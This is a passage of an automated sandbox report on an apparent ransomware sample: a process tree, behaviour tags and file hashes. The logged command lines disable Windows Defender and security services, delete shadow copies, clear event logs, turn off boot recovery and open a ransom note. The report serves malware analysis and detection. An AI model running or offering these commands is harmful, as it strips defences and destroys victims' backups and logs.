87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe net.exe PID 2808 wrote to memory of 1196 2808 net.exe net1.exe PID 2808 wrote to memory of 1196 2808 net.exe net1.exe PID 3772 wrote to memory of 1216 3772 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe net.exe PID 3772 wrote to memory of 1216 3772 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe net.exe PID 1216 wrote to memory of 3960 1216 net.exe net1.exe PID 1216 wrote to memory of 3960 1216 net.exe net1.exe PID 3772 wrote to memory of 1868 3772 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe net.exe PID 3772 wrote to memory of 1868 3772 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe net.exe PID 1868 wrote to memory of 1384 1868 net.exe net1.exe PID 1868 wrote to memory of 1384 1868 net.exe net1.exe PID 3772 wrote to memory of 2152 3772 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe net.exe PID 3772 wrote to memory of 2152 3772 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe net.exe PID 2152 wrote to memory of 3012 2152 net.exe net1.exe PID 2152 wrote to memory of 3012 2152 net.exe net1.exe PID 3772 wrote to memory of 4044 3772 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe net.exe PID 3772 wrote to memory of 4044 3772 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe net.exe PID 4044 wrote to memory of 2312 4044 net.exe net1.exe PID 4044 wrote to memory of 2312 4044 net.exe net1.exe PID 3772 wrote to memory of 388 3772 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe net.exe PID 3772 wrote to memory of 388 3772 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe net.exe PID 388 wrote to memory of 924 388 net.exe net1.exe PID 388 wrote to memory of 924 388 net.exe net1.exe PID 3772 wrote to memory of 740 3772 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe net.exe PID 3772 wrote to memory of 740 3772 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe net.exe PID 740 wrote to memory of 1268 740 net.exe net1.exe PID 740 wrote to memory of 1268 740 net.exe net1.exe PID 3772 wrote to memory of 860 3772 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe sc.exe PID 3772 wrote to memory of 860 3772 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe sc.exe PID 3772 wrote to memory of 1080 3772 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe sc.exe PID 3772 wrote to memory of 1080 3772 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe sc.exe PID 3772 wrote to memory of 1344 3772 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe sc.exe PID 3772 wrote to memory of 1344 3772 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe sc.exe PID 3772 wrote to memory of 1340 3772 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe sc.exe PID 3772 wrote to memory of 1340 3772 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe sc.exe PID 3772 wrote to memory of 2092 3772 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe sc.exe PID 3772 wrote to memory of 2092 3772 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe sc.exe PID 3772 wrote to memory of 1680 3772 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe sc.exe PID 3772 wrote to memory of 1680 3772 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe sc.exe PID 3772 wrote to memory of 1968 3772 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe sc.exe PID 3772 wrote to memory of 1968 3772 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe sc.exe PID 3772 wrote to memory of 2192 3772 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe sc.exe PID 3772 wrote to memory of 2192 3772 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe sc.exe PID 3772 wrote to memory of 3048 3772 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe sc.exe PID 3772 wrote to memory of 3048 3772 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe sc.exe PID 3772 wrote to memory of 3636 3772 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe reg.exe PID 3772 wrote to memory of 3636 3772 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe reg.exe PID 3772 wrote to memory of 3068 3772 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe reg.exe PID 3772 wrote to memory of 3068 3772 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe reg.exe PID 3772 wrote to memory of 2064 3772 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe reg.exe PID 3772 wrote to memory of 2064 3772 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe reg.exe PID 3772 wrote to memory of 1972 3772 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe reg.exe PID 3772 wrote to memory of 1972 3772 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe reg.exe PID 3772 wrote to memory of 2680 3772 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe reg.exe PID 3772 wrote to memory of 2680 3772 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe reg.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe"C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe"1⤵
- Modifies extensions of user files
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3772 -
C:\Windows\SYSTEM32\net.exenet.exe stop "SamSs" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1152 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SamSs" /y3⤵PID:3972
-
C:\Windows\SYSTEM32\net.exenet.exe stop "SDRSVC" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1964 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SDRSVC" /y3⤵PID:4072
-
C:\Windows\SYSTEM32\net.exenet.exe stop "SstpSvc" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2808 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SstpSvc" /y3⤵PID:1196
-
C:\Windows\SYSTEM32\net.exenet.exe stop "UI0Detect" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1216 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "UI0Detect" /y3⤵PID:3960
-
C:\Windows\SYSTEM32\net.exenet.exe stop "vmicvss" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1868 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "vmicvss" /y3⤵PID:1384
-
C:\Windows\SYSTEM32\net.exenet.exe stop "VSS" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2152 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VSS" /y3⤵PID:3012
-
C:\Windows\SYSTEM32\net.exenet.exe stop "wbengine" /y2⤵
- Suspicious use of WriteProcessMemory
PID:4044 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "wbengine" /y3⤵PID:2312
-
C:\Windows\SYSTEM32\net.exenet.exe stop "WebClient" /y2⤵
- Suspicious use of WriteProcessMemory
PID:388 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WebClient" /y3⤵PID:924
-
C:\Windows\SYSTEM32\net.exenet.exe stop "UnistoreSvc_12d5a" /y2⤵
- Suspicious use of WriteProcessMemory
PID:740 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "UnistoreSvc_12d5a" /y3⤵PID:1268
-
C:\Windows\SYSTEM32\sc.exesc.exe config "SamSs" start= disabled2⤵PID:860
-
C:\Windows\SYSTEM32\sc.exesc.exe config "SDRSVC" start= disabled2⤵PID:1080
-
C:\Windows\SYSTEM32\sc.exesc.exe config "SstpSvc" start= disabled2⤵PID:1344
-
C:\Windows\SYSTEM32\sc.exesc.exe config "UI0Detect" start= disabled2⤵PID:1340
-
C:\Windows\SYSTEM32\sc.exesc.exe config "vmicvss" start= disabled2⤵PID:2092
-
C:\Windows\SYSTEM32\sc.exesc.exe config "VSS" start= disabled2⤵PID:1680
-
C:\Windows\SYSTEM32\sc.exesc.exe config "wbengine" start= disabled2⤵PID:1968
-
C:\Windows\SYSTEM32\sc.exesc.exe config "WebClient" start= disabled2⤵PID:2192
-
C:\Windows\SYSTEM32\sc.exesc.exe config "UnistoreSvc_12d5a" start= disabled2⤵PID:3048
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:3636
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f2⤵PID:3068
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:2064
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f2⤵PID:1972
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f2⤵PID:2680
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵PID:2540
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f2⤵PID:3648
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵PID:3228
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f2⤵PID:3580
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵PID:3884
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f2⤵PID:2504
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f2⤵PID:3996
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f2⤵PID:3564
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f2⤵PID:2776
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:3600
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:3484
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable2⤵PID:2156
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable2⤵PID:3360
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable2⤵PID:3708
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable2⤵PID:2912
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable2⤵PID:988
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f2⤵PID:4088
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f2⤵PID:1088
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f2⤵PID:3308
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:1496 -
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:1756 -
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:1920 -
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:620
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:376
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:2648
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:792
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies security service
PID:1048 -
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:3096
-
C:\Windows\SYSTEM32\vssadmin.exevssadmin.exe delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:3664 -
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl system2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3064 -
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl security2⤵PID:3936
-
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl application2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3944 -
C:\Windows\System32\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1896 -
C:\Windows\System32\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1208 -
C:\Windows\SYSTEM32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:1428 -
C:\Windows\SYSTEM32\bcdedit.exebcdedit.exe /set {default} recoveryenabled no2⤵
- Modifies boot configuration data using bcdedit
PID:3012 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:2312
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵
- Deletes Windows Defender Definitions
PID:2708 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:1744
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1424 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:964
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:3784 -
C:\Windows\SYSTEM32\notepad.exenotepad.exe C:\rFSH_HOW_TO_DECRYPT.txt2⤵
- Opens file in notepad (likely ransom note)
PID:3172 -
C:\Windows\SYSTEM32\cmd.execmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe"2⤵PID:1816
-
C:\Windows\system32\PING.EXEping.exe -n 5 127.0.0.13⤵
- Runs ping.exe
PID:3880
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\rFSH_HOW_TO_DECRYPT.txt1⤵
- Opens file in notepad (likely ransom note)
PID:3388
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
ad5cd538ca58cb28ede39c108acb5785
SHA11ae910026f3dbe90ed025e9e96ead2b5399be877
SHA256c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033
SHA512c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13
-
MD5
c1a9d60c2e12f184bc957bde395d9714
SHA136a90d4e8d80cb494820c315ad209ce0453d2c95
SHA256c450f7df47f32bba121d1f3b205bcbc28fe82828c74fdb4a0de3de3eaf73a882
SHA5129096ca09ae78e4c52a0387e2df2523356b95bc081364f0940a247459aa1904964756b53c8420f33da9877b9271395b1a1a55822ca2e2ad6697869825570485ec
-
MD5
9feb836dd50f68cbf9e87dad21a2fbc4
SHA1f995609d7ea8a22383c8f28e2ac9b657fa767019
SHA256773b3349fdbb3a90decde363815564f1eb0be1549650ec3cfd3f785f27e3d88e
SHA512123db92c2616a2f913c91c6811cf8a375b69b3d71d40ab2633ca298cfda0aa863a3a3f106096f01cbfa01b7f0e56693babf04b1f7f0d7e90b405c9cf54147748
-
MD5
9feb836dd50f68cbf9e87dad21a2fbc4
SHA1f995609d7ea8a22383c8f28e2ac9b657fa767019
SHA256773b3349fdbb3a90decde363815564f1eb0be1549650ec3cfd3f785f27e3d88e
SHA512123db92c2616a2f913c91c6811cf8a375b69b3d71d40ab2633ca298cfda0aa863a3a3f106096f01cbfa01b7f0e56693babf04b1f7f0d7e90b405c9cf54147748